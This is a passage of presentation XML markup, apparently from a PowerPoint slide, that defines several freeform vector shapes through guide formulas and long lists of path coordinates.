                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>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5154" name="Freeform 105"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="604" y="2491"/>
                <a:ext cx="39" cy="26"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 118"/>
                  <a:gd name="T1" fmla="*/ 0 h 83"/>
                  <a:gd name="T2" fmla="*/ 0 w 118"/>
                  <a:gd name="T3" fmla="*/ 0 h 83"/>
                  <a:gd name="T4" fmla="*/ 0 w 118"/>
                  <a:gd name="T5" fmla="*/ 0 h 83"/>
                  <a:gd name="T6" fmla="*/ 0 w 118"/>
                  <a:gd name="T7" fmla="*/ 0 h 83"/>
                  <a:gd name="T8" fmla="*/ 0 w 118"/>
                  <a:gd name="T9" fmla="*/ 0 h 83"/>
                  <a:gd name="T10" fmla="*/ 0 w 118"/>
                  <a:gd name="T11" fmla="*/ 0 h 83"/>
                  <a:gd name="T12" fmla="*/ 0 w 118"/>
                  <a:gd name="T13" fmla="*/ 0 h 83"/>
                  <a:gd name="T14" fmla="*/ 0 w 118"/>
                  <a:gd name="T15" fmla="*/ 0 h 83"/>
                  <a:gd name="T16" fmla="*/ 0 w 118"/>
                  <a:gd name="T17" fmla="*/ 0 h 83"/>
                  <a:gd name="T18" fmla="*/ 0 w 118"/>
                  <a:gd name="T19" fmla="*/ 0 h 83"/>
                  <a:gd name="T20" fmla="*/ 0 w 118"/>
                  <a:gd name="T21" fmla="*/ 0 h 83"/>
                  <a:gd name="T22" fmla="*/ 0 w 118"/>
                  <a:gd name="T23" fmla="*/ 0 h 83"/>
                  <a:gd name="T24" fmla="*/ 0 w 118"/>
                  <a:gd name="T25" fmla="*/ 0 h 83"/>
                  <a:gd name="T26" fmla="*/ 0 w 118"/>
                  <a:gd name="T27" fmla="*/ 0 h 83"/>
                  <a:gd name="T28" fmla="*/ 0 w 118"/>
                  <a:gd name="T29" fmla="*/ 0 h 83"/>
                  <a:gd name="T30" fmla="*/ 0 w 118"/>
                  <a:gd name="T31" fmla="*/ 0 h 83"/>
                  <a:gd name="T32" fmla="*/ 0 w 118"/>
                  <a:gd name="T33" fmla="*/ 0 h 83"/>
                  <a:gd name="T34" fmla="*/ 0 w 118"/>
                  <a:gd name="T35" fmla="*/ 0 h 83"/>
                  <a:gd name="T36" fmla="*/ 0 w 118"/>
                  <a:gd name="T37" fmla="*/ 0 h 83"/>
                  <a:gd name="T38" fmla="*/ 0 w 118"/>
                  <a:gd name="T39" fmla="*/ 0 h 83"/>
                  <a:gd name="T40" fmla="*/ 0 w 118"/>
                  <a:gd name="T41" fmla="*/ 0 h 83"/>
                  <a:gd name="T42" fmla="*/ 0 w 118"/>
                  <a:gd name="T43" fmla="*/ 0 h 83"/>
                  <a:gd name="T44" fmla="*/ 0 w 118"/>
                  <a:gd name="T45" fmla="*/ 0 h 83"/>
                  <a:gd name="T46" fmla="*/ 0 w 118"/>
                  <a:gd name="T47" fmla="*/ 0 h 83"/>
                  <a:gd name="T48" fmla="*/ 0 w 118"/>
                  <a:gd name="T49" fmla="*/ 0 h 83"/>
                  <a:gd name="T50" fmla="*/ 0 w 118"/>
                  <a:gd name="T51" fmla="*/ 0 h 83"/>
                  <a:gd name="T52" fmla="*/ 0 w 118"/>
                  <a:gd name="T53" fmla="*/ 0 h 83"/>
                  <a:gd name="T54" fmla="*/ 0 w 118"/>
                  <a:gd name="T55" fmla="*/ 0 h 83"/>
                  <a:gd name="T56" fmla="*/ 0 w 118"/>
                  <a:gd name="T57" fmla="*/ 0 h 83"/>
                  <a:gd name="T58" fmla="*/ 0 w 118"/>
                  <a:gd name="T59" fmla="*/ 0 h 83"/>
                  <a:gd name="T60" fmla="*/ 0 w 118"/>
                  <a:gd name="T61" fmla="*/ 0 h 83"/>
                  <a:gd name="T62" fmla="*/ 0 w 118"/>
                  <a:gd name="T63" fmla="*/ 0 h 83"/>
                  <a:gd name="T64" fmla="*/ 0 w 118"/>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83"/>
                  <a:gd name="T101" fmla="*/ 118 w 118"/>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83">
                    <a:moveTo>
                      <a:pt x="3" y="75"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="75"/>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5155" name="Freeform 106"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="482" y="2551"/>
                <a:ext cx="61" cy="24"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 188"/>
                  <a:gd name="T1" fmla="*/ 0 h 71"/>
                  <a:gd name="T2" fmla="*/ 0 w 188"/>
                  <a:gd name="T3" fmla="*/ 0 h 71"/>
                  <a:gd name="T4" fmla="*/ 0 w 188"/>
                  <a:gd name="T5" fmla="*/ 0 h 71"/>
                  <a:gd name="T6" fmla="*/ 0 w 188"/>
                  <a:gd name="T7" fmla="*/ 0 h 71"/>
                  <a:gd name="T8" fmla="*/ 0 w 188"/>
                  <a:gd name="T9" fmla="*/ 0 h 71"/>
                  <a:gd name="T10" fmla="*/ 0 w 188"/>
                  <a:gd name="T11" fmla="*/ 0 h 71"/>
                  <a:gd name="T12" fmla="*/ 0 w 188"/>
                  <a:gd name="T13" fmla="*/ 0 h 71"/>
                  <a:gd name="T14" fmla="*/ 0 w 188"/>
                  <a:gd name="T15" fmla="*/ 0 h 71"/>
                  <a:gd name="T16" fmla="*/ 0 w 188"/>
                  <a:gd name="T17" fmla="*/ 0 h 71"/>
                  <a:gd name="T18" fmla="*/ 0 w 188"/>
                  <a:gd name="T19" fmla="*/ 0 h 71"/>
                  <a:gd name="T20" fmla="*/ 0 w 188"/>
                  <a:gd name="T21" fmla="*/ 0 h 71"/>
                  <a:gd name="T22" fmla="*/ 0 w 188"/>
                  <a:gd name="T23" fmla="*/ 0 h 71"/>
                  <a:gd name="T24" fmla="*/ 0 w 188"/>
                  <a:gd name="T25" fmla="*/ 0 h 71"/>
                  <a:gd name="T26" fmla="*/ 0 w 188"/>
                  <a:gd name="T27" fmla="*/ 0 h 71"/>
                  <a:gd name="T28" fmla="*/ 0 w 188"/>
                  <a:gd name="T29" fmla="*/ 0 h 71"/>
                  <a:gd name="T30" fmla="*/ 0 w 188"/>
                  <a:gd name="T31" fmla="*/ 0 h 71"/>
                  <a:gd name="T32" fmla="*/ 0 w 188"/>
                  <a:gd name="T33" fmla="*/ 0 h 71"/>
                  <a:gd name="T34" fmla="*/ 0 w 188"/>
                  <a:gd name="T35" fmla="*/ 0 h 71"/>
                  <a:gd name="T36" fmla="*/ 0 w 188"/>
                  <a:gd name="T37" fmla="*/ 0 h 71"/>
                  <a:gd name="T38" fmla="*/ 0 w 188"/>
                  <a:gd name="T39" fmla="*/ 0 h 71"/>
                  <a:gd name="T40" fmla="*/ 0 w 188"/>
                  <a:gd name="T41" fmla="*/ 0 h 71"/>
                  <a:gd name="T42" fmla="*/ 0 w 188"/>
                  <a:gd name="T43" fmla="*/ 0 h 71"/>
                  <a:gd name="T44" fmla="*/ 0 w 188"/>
                  <a:gd name="T45" fmla="*/ 0 h 71"/>
                  <a:gd name="T46" fmla="*/ 0 w 188"/>
                  <a:gd name="T47" fmla="*/ 0 h 71"/>
                  <a:gd name="T48" fmla="*/ 0 w 188"/>
                  <a:gd name="T49" fmla="*/ 0 h 71"/>
                  <a:gd name="T50" fmla="*/ 0 w 188"/>
                  <a:gd name="T51" fmla="*/ 0 h 71"/>
                  <a:gd name="T52" fmla="*/ 0 w 188"/>
                  <a:gd name="T53" fmla="*/ 0 h 71"/>
                  <a:gd name="T54" fmla="*/ 0 w 188"/>
                  <a:gd name="T55" fmla="*/ 0 h 71"/>
                  <a:gd name="T56" fmla="*/ 0 w 188"/>
                  <a:gd name="T57" fmla="*/ 0 h 71"/>
                  <a:gd name="T58" fmla="*/ 0 w 188"/>
                  <a:gd name="T59" fmla="*/ 0 h 71"/>
                  <a:gd name="T60" fmla="*/ 0 w 188"/>
                  <a:gd name="T61" fmla="*/ 0 h 71"/>
                  <a:gd name="T62" fmla="*/ 0 w 188"/>
                  <a:gd name="T63" fmla="*/ 0 h 71"/>
                  <a:gd name="T64" fmla="*/ 0 w 188"/>
                  <a:gd name="T65" fmla="*/ 0 h 71"/>
                  <a:gd name="T66" fmla="*/ 0 w 188"/>
                  <a:gd name="T67" fmla="*/ 0 h 71"/>
                  <a:gd name="T68" fmla="*/ 0 w 188"/>
                  <a:gd name="T69" fmla="*/ 0 h 71"/>
                  <a:gd name="T70" fmla="*/ 0 w 188"/>
                  <a:gd name="T71" fmla="*/ 0 h 71"/>
                  <a:gd name="T72" fmla="*/ 0 w 188"/>
                  <a:gd name="T73" fmla="*/ 0 h 71"/>
                  <a:gd name="T74" fmla="*/ 0 w 188"/>
                  <a:gd name="T75" fmla="*/ 0 h 71"/>
                  <a:gd name="T76" fmla="*/ 0 w 188"/>
                  <a:gd name="T77" fmla="*/ 0 h 71"/>
                  <a:gd name="T78" fmla="*/ 0 w 188"/>
                  <a:gd name="T79" fmla="*/ 0 h 71"/>
                  <a:gd name="T80" fmla="*/ 0 w 188"/>
                  <a:gd name="T81" fmla="*/ 0 h 71"/>
                  <a:gd name="T82" fmla="*/ 0 w 188"/>
                  <a:gd name="T83" fmla="*/ 0 h 71"/>
                  <a:gd name="T84" fmla="*/ 0 w 188"/>
                  <a:gd name="T85" fmla="*/ 0 h 71"/>
                  <a:gd name="T86" fmla="*/ 0 w 188"/>
                  <a:gd name="T87" fmla="*/ 0 h 71"/>
                  <a:gd name="T88" fmla="*/ 0 w 188"/>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8"/>
                  <a:gd name="T136" fmla="*/ 0 h 71"/>
                  <a:gd name="T137" fmla="*/ 188 w 188"/>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8" h="71">
                    <a:moveTo>
                      <a:pt x="2" y="52"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="52"/>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5156" name="Freeform 107"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="456" y="2567"/>
                <a:ext cx="22" cy="7"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 65"/>
                  <a:gd name="T1" fmla="*/ 0 h 23"/>
                  <a:gd name="T2" fmla="*/ 0 w 65"/>
                  <a:gd name="T3" fmla="*/ 0 h 23"/>
                  <a:gd name="T4" fmla="*/ 0 w 65"/>
                  <a:gd name="T5" fmla="*/ 0 h 23"/>
                  <a:gd name="T6" fmla="*/ 0 w 65"/>
                  <a:gd name="T7" fmla="*/ 0 h 23"/>
                  <a:gd name="T8" fmla="*/ 0 w 65"/>
                  <a:gd name="T9" fmla="*/ 0 h 23"/>
                  <a:gd name="T10" fmla="*/ 0 w 65"/>
                  <a:gd name="T11" fmla="*/ 0 h 23"/>
                  <a:gd name="T12" fmla="*/ 0 w 65"/>
                  <a:gd name="T13" fmla="*/ 0 h 23"/>
                  <a:gd name="T14" fmla="*/ 0 w 65"/>
                  <a:gd name="T15" fmla="*/ 0 h 23"/>
                  <a:gd name="T16" fmla="*/ 0 w 65"/>
                  <a:gd name="T17" fmla="*/ 0 h 23"/>
                  <a:gd name="T18" fmla="*/ 0 w 65"/>
                  <a:gd name="T19" fmla="*/ 0 h 23"/>
                  <a:gd name="T20" fmla="*/ 0 w 65"/>
                  <a:gd name="T21" fmla="*/ 0 h 23"/>
                  <a:gd name="T22" fmla="*/ 0 w 65"/>
                  <a:gd name="T23" fmla="*/ 0 h 23"/>
                  <a:gd name="T24" fmla="*/ 0 w 65"/>
                  <a:gd name="T25" fmla="*/ 0 h 23"/>
                  <a:gd name="T26" fmla="*/ 0 w 65"/>
                  <a:gd name="T27" fmla="*/ 0 h 23"/>
                  <a:gd name="T28" fmla="*/ 0 w 65"/>
                  <a:gd name="T29" fmla="*/ 0 h 23"/>
                  <a:gd name="T30" fmla="*/ 0 w 65"/>
                  <a:gd name="T31" fmla="*/ 0 h 23"/>
                  <a:gd name="T32" fmla="*/ 0 w 65"/>
                  <a:gd name="T33" fmla="*/ 0 h 23"/>
                  <a:gd name="T34" fmla="*/ 0 w 65"/>
                  <a:gd name="T35" fmla="*/ 0 h 23"/>
                  <a:gd name="T36" fmla="*/ 0 w 65"/>
                  <a:gd name="T37" fmla="*/ 0 h 23"/>
                  <a:gd name="T38" fmla="*/ 0 w 65"/>
                  <a:gd name="T39" fmla="*/ 0 h 23"/>
                  <a:gd name="T40" fmla="*/ 0 w 65"/>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3"/>
                  <a:gd name="T65" fmla="*/ 65 w 65"/>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3">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0"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5157" name="Freeform 108"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="383" y="2461"/>
                <a:ext cx="11" cy="9"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 31"/>
                  <a:gd name="T1" fmla="*/ 0 h 28"/>
                  <a:gd name="T2" fmla="*/ 0 w 31"/>
                  <a:gd name="T3" fmla="*/ 0 h 28"/>
                  <a:gd name="T4" fmla="*/ 0 w 31"/>
                  <a:gd name="T5" fmla="*/ 0 h 28"/>
                  <a:gd name="T6" fmla="*/ 0 w 31"/>
                  <a:gd name="T7" fmla="*/ 0 h 28"/>
                  <a:gd name="T8" fmla="*/ 0 w 31"/>
                  <a:gd name="T9" fmla="*/ 0 h 28"/>
                  <a:gd name="T10" fmla="*/ 0 w 31"/>
                  <a:gd name="T11" fmla="*/ 0 h 28"/>
                  <a:gd name="T12" fmla="*/ 0 w 31"/>
                  <a:gd name="T13" fmla="*/ 0 h 28"/>
                  <a:gd name="T14" fmla="*/ 0 w 31"/>
                  <a:gd name="T15" fmla="*/ 0 h 28"/>
                  <a:gd name="T16" fmla="*/ 0 w 31"/>
                  <a:gd name="T17" fmla="*/ 0 h 28"/>
                  <a:gd name="T18" fmla="*/ 0 w 31"/>
                  <a:gd name="T19" fmla="*/ 0 h 28"/>
                  <a:gd name="T20" fmla="*/ 0 w 31"/>
                  <a:gd name="T21" fmla="*/ 0 h 28"/>
                  <a:gd name="T22" fmla="*/ 0 w 31"/>
                  <a:gd name="T23" fmla="*/ 0 h 28"/>
                  <a:gd name="T24" fmla="*/ 0 w 31"/>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28"/>
                  <a:gd name="T41" fmla="*/ 31 w 31"/>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28">
                    <a:moveTo>
                      <a:pt x="21" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="25" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21"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5158" name="Freeform 109"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="349" y="2396"/>
                <a:ext cx="57" cy="24"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 176"/>
                  <a:gd name="T1" fmla="*/ 0 h 72"/>
                  <a:gd name="T2" fmla="*/ 0 w 176"/>
                  <a:gd name="T3" fmla="*/ 0 h 72"/>
                  <a:gd name="T4" fmla="*/ 0 w 176"/>
                  <a:gd name="T5" fmla="*/ 0 h 72"/>
                  <a:gd name="T6" fmla="*/ 0 w 176"/>
                  <a:gd name="T7" fmla="*/ 0 h 72"/>
                  <a:gd name="T8" fmla="*/ 0 w 176"/>
                  <a:gd name="T9" fmla="*/ 0 h 72"/>
                  <a:gd name="T10" fmla="*/ 0 w 176"/>
                  <a:gd name="T11" fmla="*/ 0 h 72"/>
                  <a:gd name="T12" fmla="*/ 0 w 176"/>
                  <a:gd name="T13" fmla="*/ 0 h 72"/>
                  <a:gd name="T14" fmla="*/ 0 w 176"/>
                  <a:gd name="T15" fmla="*/ 0 h 72"/>
                  <a:gd name="T16" fmla="*/ 0 w 176"/>
                  <a:gd name="T17" fmla="*/ 0 h 72"/>
                  <a:gd name="T18" fmla="*/ 0 w 176"/>
                  <a:gd name="T19" fmla="*/ 0 h 72"/>
                  <a:gd name="T20" fmla="*/ 0 w 176"/>
                  <a:gd name="T21" fmla="*/ 0 h 72"/>
                  <a:gd name="T22" fmla="*/ 0 w 176"/>
                  <a:gd name="T23" fmla="*/ 0 h 72"/>
                  <a:gd name="T24" fmla="*/ 0 w 176"/>
                  <a:gd name="T25" fmla="*/ 0 h 72"/>
                  <a:gd name="T26" fmla="*/ 0 w 176"/>
                  <a:gd name="T27" fmla="*/ 0 h 72"/>
                  <a:gd name="T28" fmla="*/ 0 w 176"/>
                  <a:gd name="T29" fmla="*/ 0 h 72"/>
                  <a:gd name="T30" fmla="*/ 0 w 176"/>
                  <a:gd name="T31" fmla="*/ 0 h 72"/>
                  <a:gd name="T32" fmla="*/ 0 w 176"/>
                  <a:gd name="T33" fmla="*/ 0 h 72"/>
                  <a:gd name="T34" fmla="*/ 0 w 176"/>
                  <a:gd name="T35" fmla="*/ 0 h 72"/>
                  <a:gd name="T36" fmla="*/ 0 w 176"/>
                  <a:gd name="T37" fmla="*/ 0 h 72"/>
                  <a:gd name="T38" fmla="*/ 0 w 176"/>
                  <a:gd name="T39" fmla="*/ 0 h 72"/>
                  <a:gd name="T40" fmla="*/ 0 w 176"/>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6"/>
                  <a:gd name="T64" fmla="*/ 0 h 72"/>
                  <a:gd name="T65" fmla="*/ 176 w 176"/>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6" h="72">
                    <a:moveTo>
                      <a:pt x="170" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="172" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170"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5159" name="Freeform 110"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="300" y="2474"/>
                <a:ext cx="10" cy="24"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 31"/>
                  <a:gd name="T1" fmla="*/ 0 h 71"/>
                  <a:gd name="T2" fmla="*/ 0 w 31"/>
